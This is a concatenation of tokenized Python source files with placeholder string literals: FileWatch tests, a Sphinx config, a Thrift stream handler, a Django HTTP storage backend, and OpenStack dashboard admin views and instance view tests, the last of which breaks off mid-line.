new_content ) <EOL> f . close ( ) <EOL> expected_serverset = new_content . split ( '<STR_LIT:\n>' ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_unrecognized_watch_type ( self ) : <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> def on_change ( value , stat ) : <EOL> pass <EOL> self . assertRaises ( <EOL> Exception , <EOL> watch . add_watch , <EOL> tmp_file , <EOL> on_change , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_exception_on_config_callback ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> def on_change1 ( value , stat ) : <EOL> raise Exception <EOL> test_data2 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change2 ( value , stat ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> test_data2 [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_exception_on_serverset_callback ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> def on_change1 ( value ) : <EOL> raise Exception <EOL> test_data2 = [ <NUM_LIT:0> , None ] <EOL> def on_change2 ( value ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> expected_serverset = new_content . split ( '<STR_LIT:\n>' ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_nonexistent_config ( self ) : <EOL> def on_change ( value , stat ) : <EOL> pass <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> OSError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> on_change <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_nonexistent_serverest ( self ) : <EOL> def on_change ( value ) : <EOL> pass <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> OSError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> on_change , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_null_callback_config ( self ) : <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> AssertionError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> None <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_null_callback_serverset ( self ) : <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> AssertionError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> None , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def _validate_empty_internal_map ( self , watch ) : <EOL> self . assertEqual ( watch . _watched_file_map , { } ) <EOL> def _validate_internal_map ( self , watch , file_path , watch_type , watcher_count ) : <EOL> key = ( file_path , watch_type ) <EOL> watch_info = watch . _watched_file_map [ key ] <EOL> update_time = os . path . getmtime ( file_path ) <EOL> with open ( file_path ) as f : <EOL> hash = watch . _compute_md5_hash ( f . read ( ) ) <EOL> self . assertEqual ( watch_info [ <NUM_LIT:0> ] , update_time ) <EOL> self . assertEqual ( watch_info [ <NUM_LIT:1> ] , hash ) <EOL> self . assertEqual ( len ( watch_info [ <NUM_LIT:2> ] ) , watcher_count ) </s>
<s> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from collections import defaultdict <EOL> import sys <EOL> import traceback <EOL> from . thrift_message import ThriftMessage <EOL> class StreamContext ( object ) : <EOL> def __init__ ( self ) : <EOL> self . bytes = '<STR_LIT>' <EOL> class StreamHandler ( object ) : <EOL> def __init__ ( self , <EOL> outqueue , <EOL> protocol = None , <EOL> finagle_thrift = False , <EOL> max_message_size = <NUM_LIT> * <NUM_LIT:1000> , <EOL> read_values = False , <EOL> debug = False ) : <EOL> self . _contexts_by_streams = defaultdict ( StreamContext ) <EOL> self . _pop_size = <NUM_LIT> <EOL> self . _outqueue = outqueue <EOL> self . _protocol = protocol <EOL> self . _finagle_thrift = finagle_thrift <EOL> self . _max_message_size = max_message_size <EOL> self . _debug = debug <EOL> self . _read_values = read_values <EOL> self . _seen_messages = <NUM_LIT:0> <EOL> self . _recognized_streams = set ( ) <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> self . handler ( * args , ** kwargs ) <EOL> @ property <EOL> def seen_streams ( self ) : <EOL> return len ( self . _contexts_by_streams ) <EOL> @ property <EOL> def recognized_streams ( self ) : <EOL> return len ( self . _recognized_streams ) <EOL> @ property <EOL> def unrecognized_streams ( self ) : <EOL> return self . seen_streams - self . recognized_streams <EOL> @ property <EOL> def pending_thrift_msgs ( self ) : <EOL> return len ( self . _outqueue ) <EOL> @ property <EOL> def seen_thrift_msgs ( self ) : <EOL> return self . _seen_messages <EOL> def handler ( self , stream ) : <EOL> context = self . _contexts_by_streams [ stream ] <EOL> bytes , timestamp = stream . pop_data ( self . _pop_size ) <EOL> context . bytes += bytes <EOL> if len ( context . bytes ) >= self . _max_message_size : <EOL> if self . _debug : <EOL> print ( '<STR_LIT>' % len ( context . bytes ) ) <EOL> context . bytes = '<STR_LIT>' <EOL> return <EOL> view = memoryview ( context . bytes ) <EOL> for idx in range ( <NUM_LIT:0> , len ( context . bytes ) ) : <EOL> try : <EOL> data_slice = view [ idx : ] . tobytes ( ) <EOL> msg , msglen = ThriftMessage . read ( <EOL> data_slice , <EOL> protocol = self . _protocol , <EOL> finagle_thrift = self . _finagle_thrift , <EOL> read_values = self . _read_values ) <EOL> except EOFError : <EOL> continue <EOL> except Exception as ex : <EOL> if self . _debug : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> stream , <EOL> ex , <EOL> traceback . format_exc ( ) , <EOL> idx , <EOL> len ( context . bytes ) ) , <EOL> file = sys . stderr <EOL> ) <EOL> continue <EOL> self . _recognized_streams . add ( stream ) <EOL> self . _seen_messages += <NUM_LIT:1> <EOL> self . _outqueue . append ( ( timestamp , stream . src , stream . dst , msg ) ) <EOL> context . bytes = context . bytes [ idx + msglen : ] <EOL> break </s>
<s> try : <EOL> from urllib . parse import urljoin <EOL> except ImportError : <EOL> from urlparse import urljoin <EOL> try : <EOL> FileNotFoundError <EOL> except NameError : <EOL> FileNotFoundError = IOError <EOL> from io import BytesIO <EOL> import requests <EOL> import warnings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . conf import settings <EOL> from django . utils . encoding import filepath_to_uri <EOL> from localdevstorage . base import BaseStorage <EOL> class HttpStorage ( BaseStorage ) : <EOL> def __init__ ( self , location = None , base_url = None , fallback_url = None , fallback_domain = None ) : <EOL> self . fallback_url = fallback_url or getattr ( settings , '<STR_LIT>' , None ) <EOL> if self . fallback_url : <EOL> warnings . warn ( '<STR_LIT>' ) <EOL> self . fallback_domain = fallback_domain or getattr ( settings , '<STR_LIT>' , None ) <EOL> if not ( self . fallback_url or self . fallback_domain ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' ) <EOL> self . session = requests . Session ( ) <EOL> username = getattr ( settings , '<STR_LIT>' , None ) <EOL> password = getattr ( settings , '<STR_LIT>' , None ) <EOL> if username and password : <EOL> self . session . auth = ( username , password ) <EOL> super ( BaseStorage , self ) . __init__ ( location , base_url ) <EOL> def _exists_upstream ( self , name ) : <EOL> try : <EOL> response = self . session . head ( self . _path ( name ) ) <EOL> return response . status_code == <NUM_LIT:200> <EOL> except FileNotFoundError : <EOL> return False <EOL> def _url ( self , name ) : <EOL> return urljoin ( '<STR_LIT:/>' , filepath_to_uri ( name ) ) <EOL> def _path ( self , name ) : <EOL> if self . fallback_domain : <EOL> return urljoin ( self . fallback_domain , self . _url ( name ) ) <EOL> return self . fallback_url + name <EOL> def _get ( self , name ) : <EOL> response = self . session . get ( self . _path ( name ) ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> raise FileNotFoundError ( ) <EOL> return BytesIO ( response . content ) </s>
<s> from google . appengine . api import images <EOL> from django import forms <EOL> from app . models . upload import UploadModel <EOL> class UploadForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = UploadModel <EOL> def clean_file ( self ) : <EOL> img = self . cleaned_data [ '<STR_LIT:file>' ] <EOL> return { <EOL> "<STR_LIT>" : images . resize ( img . read ( ) , <NUM_LIT> , <NUM_LIT> ) , <EOL> "<STR_LIT>" : img . content_type <EOL> } </s>
<s> from __future__ import absolute_import , division , print_function <EOL> from django . test import TestCase <EOL> class UrlRoutingTest ( TestCase ) : <EOL> def test_dummy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( True ) </s>
<s> from django import template <EOL> from django import http <EOL> from django . conf import settings <EOL> from django . contrib . auth . decorators import login_required <EOL> from django . shortcuts import render_to_response <EOL> from django . shortcuts import redirect <EOL> from django . utils . translation import ugettext as _ <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> import urlparse <EOL> from django . contrib import messages <EOL> from django_openstack import api <EOL> from django_openstack import forms <EOL> from django_openstack . dash . views import instances as dash_instances <EOL> from django_openstack . decorators import enforce_admin_access <EOL> from openstackx . api import exceptions as api_exceptions <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class ToggleService ( forms . SelfHandlingForm ) : <EOL> service = forms . CharField ( required = False ) <EOL> name = forms . CharField ( required = False ) <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> service = api . service_get ( request , data [ '<STR_LIT>' ] ) <EOL> api . service_update ( request , <EOL> data [ '<STR_LIT>' ] , <EOL> not service . disabled ) <EOL> if service . disabled : <EOL> messages . info ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> messages . info ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> except api_exceptions . ApiException , e : <EOL> LOG . exception ( '<STR_LIT>' % <EOL> data [ '<STR_LIT>' ] ) <EOL> messages . error ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] , e . message ) <EOL> return redirect ( request . build_absolute_uri ( ) ) <EOL> @ login_required <EOL> @ enforce_admin_access <EOL> def index ( request ) : <EOL> for f in ( ToggleService , ) : <EOL> _ , handled = f . maybe_handle ( request ) <EOL> if handled : <EOL> return handled <EOL> services = [ ] <EOL> try : <EOL> services = api . service_list ( request ) <EOL> except api_exceptions . ApiException , e : <EOL> LOG . exception ( '<STR_LIT>' ) <EOL> messages . error ( request , '<STR_LIT>' % e . message ) <EOL> other_services = [ ] <EOL> for service in request . session [ '<STR_LIT>' ] : <EOL> url = service [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> try : <EOL> subprocess . check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , url ] , <EOL> stdout = open ( os . devnull , '<STR_LIT:w>' ) , <EOL> stderr = open ( os . devnull , '<STR_LIT:w>' ) ) <EOL> up = True <EOL> except : <EOL> up = False <EOL> hostname = urlparse . urlparse ( url ) . hostname <EOL> row = { '<STR_LIT:type>' : service [ '<STR_LIT:type>' ] , '<STR_LIT>' : url , '<STR_LIT:host>' : hostname , <EOL> '<STR_LIT>' : service [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' : up } <EOL> other_services . append ( row ) <EOL> services = sorted ( services , key = lambda svc : ( svc . type + <EOL> svc . host ) ) <EOL> other_services = sorted ( other_services , key = lambda svc : ( svc [ '<STR_LIT:type>' ] + <EOL> svc [ '<STR_LIT:host>' ] ) ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , { <EOL> '<STR_LIT>' : services , <EOL> '<STR_LIT>' : ToggleService , <EOL> '<STR_LIT>' : other_services , <EOL> } , context_instance = template . RequestContext ( request ) ) </s>
<s> import datetime <EOL> from django import http <EOL> from django . contrib import messages <EOL> from django . core . urlresolvers import reverse <EOL> from django_openstack import api <EOL> from django_openstack import utils <EOL> from django_openstack . tests . view_tests import base <EOL> from openstackx . api import exceptions as api_exceptions <EOL> from mox import IsA , IgnoreArg <EOL> class InstanceViewTests ( base . BaseViewTests ) : <EOL> def setUp ( self ) : <EOL> super ( InstanceViewTests , self ) . setUp ( ) <EOL> server = self . mox . CreateMock ( api . Server ) <EOL> server . id = <NUM_LIT:1> <EOL> server . name = '<STR_LIT>' <EOL> server . attrs = { '<STR_LIT:description>' : '<STR_LIT>' } <EOL> self . servers = ( server , ) <EOL> def test_index ( self ) : <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . servers ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] , self . servers ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_index_server_list_exception ( self ) : <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> api . server_list ( IsA ( http . HttpRequest ) ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( len ( res . context [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_terminate_instance ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_delete ( IsA ( http . HttpRequest ) , <EOL> self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_terminate_instance_exception ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_delete ( IsA ( http . HttpRequest ) , <EOL> self . servers [ <NUM_LIT:0> ] ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( unicode ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reboot_instance ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_reboot ( IsA ( http . HttpRequest ) , unicode ( self . servers [ <NUM_LIT:0> ] . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reboot_instance_exception ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> api . server_reboot ( IsA ( http . HttpRequest ) , <EOL> unicode ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( str ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def override_times ( self , time = datetime . datetime . now ) : <EOL> now = datetime . datetime . utcnow ( ) <EOL> utils . time . override_time = datetime . time ( now . hour , now . minute , now . second ) <EOL> utils . today . override_time = datetime . date ( now . year , now . month , now . day ) <EOL> utils . utcnow . override_time = now <EOL> return now <EOL> def reset_times ( self ) : <EOL> utils . time . override_time = None <EOL> utils . today . override_time = None <EOL> utils . utcnow . override_time = None <EOL> def test_instance_usage ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_csv_usage ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) + <EOL> "<STR_LIT>" ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_usage_exception ( self ) : <EOL> now = self . override_times ( ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( str ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , { } ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_usage_default_tenant ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_console ( self ) : <EOL> CONSOLE_OUTPUT = '<STR_LIT>' <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> console_mock = self . mox . CreateMock ( api . Console ) <EOL> console_mock . output = CONSOLE_OUTPUT <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> IgnoreArg ( ) ) . AndReturn ( console_mock ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertIsInstance ( res , http . HttpResponse ) <EOL> self . assertContains ( res , CONSOLE_OUTPUT ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_console_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> IgnoreArg ( ) ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IgnoreArg ( ) , IsA ( unicode ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_vnc ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> CONSOLE_OUTPUT = '<STR_LIT>' <EOL> console_mock = self . mox . CreateMock ( api . Console ) <EOL> console_mock . output = CONSOLE_OUTPUT <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> api . console_create ( IgnoreArg ( ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> '<STR_LIT>' ) . AndReturn ( console_mock ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , <EOL> CONSOLE_OUTPUT + '<STR_LIT>' ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_vnc_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . console_create ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) , <EOL> '<STR_LIT>' ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_get ( self ) : <EOL> INSTANCE_ID = self . servers [ <NUM_LIT:0> ] . id <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> unicode ( INSTANCE_ID ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT , INSTANCE_ID ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_instance_update_get_server_get_exception ( self ) : <EOL> INSTANCE_ID = self . servers [ 